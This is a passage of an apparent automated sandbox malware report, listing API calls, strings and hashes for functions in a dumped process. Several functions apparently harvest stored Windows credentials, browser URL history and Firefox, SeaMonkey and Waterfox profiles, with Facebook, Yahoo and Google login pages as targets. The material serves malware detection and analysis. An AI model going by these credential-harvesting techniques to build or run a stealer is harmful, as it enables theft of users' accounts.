                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                      • API String ID: 3883404497-2982631422
                                                                                                                                                                                                                      • Opcode ID: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
                                                                                                                                                                                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6320f83e9b091826697580f88646c77f053f42bbd7529e7c130ef97409cf436
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040BD2B
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 509814883-3916222277
                                                                                                                                                                                                                      • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 848 41837f-4183bf 849 4183c1-4183cc call 418197 848->849 850 4183dc-4183ec call 418160 848->850 855 4183d2-4183d8 849->855 856 418517-41851d 849->856 857 4183f6-41840b 850->857 858 4183ee-4183f1 850->858 855->850 859 418417-418423 857->859 860 41840d-418415 857->860 858->856 861 418427-418442 call 41739b 859->861 860->861 864 418444-41845d CreateFileW 861->864 865 41845f-418475 CreateFileA 861->865 866 418477-41847c 864->866 865->866 867 4184c2-4184c7 866->867 868 41847e-418495 GetLastError ??3@YAXPAX@Z 866->868 871 4184d5-418501 memset call 418758 867->871 872 4184c9-4184d3 867->872 869 4184b5-4184c0 call 444706 868->869 870 418497-4184b3 call 41837f 868->870 869->856 870->856 878 418506-418515 ??3@YAXPAX@Z 871->878 872->871 878->856
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile$??3@ErrorLast
                                                                                                                                                                                                                      • String ID: |A
                                                                                                                                                                                                                      • API String ID: 1407640353-1717621600
                                                                                                                                                                                                                      • Opcode ID: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
                                                                                                                                                                                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5aeeff076a9cd849f72a1ec08649adad283ef9ce1d91fa95086884072959f8da
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                      • API String ID: 2791114272-628097481
                                                                                                                                                                                                                      • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                      • API String ID: 62308376-4196376884
                                                                                                                                                                                                                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                      • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3191383707-0
                                                                                                                                                                                                                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                      • API String ID: 3527940856-11920434
                                                                                                                                                                                                                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                      • API String ID: 3527940856-2068335096
                                                                                                                                                                                                                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                      • API String ID: 3527940856-3369679110
                                                                                                                                                                                                                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                      • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                      • Opcode ID: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
                                                                                                                                                                                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004033D0
                                                                                                                                                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                                                                                                                      • String ID: $0.@
                                                                                                                                                                                                                      • API String ID: 3030842498-1896041820
                                                                                                                                                                                                                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
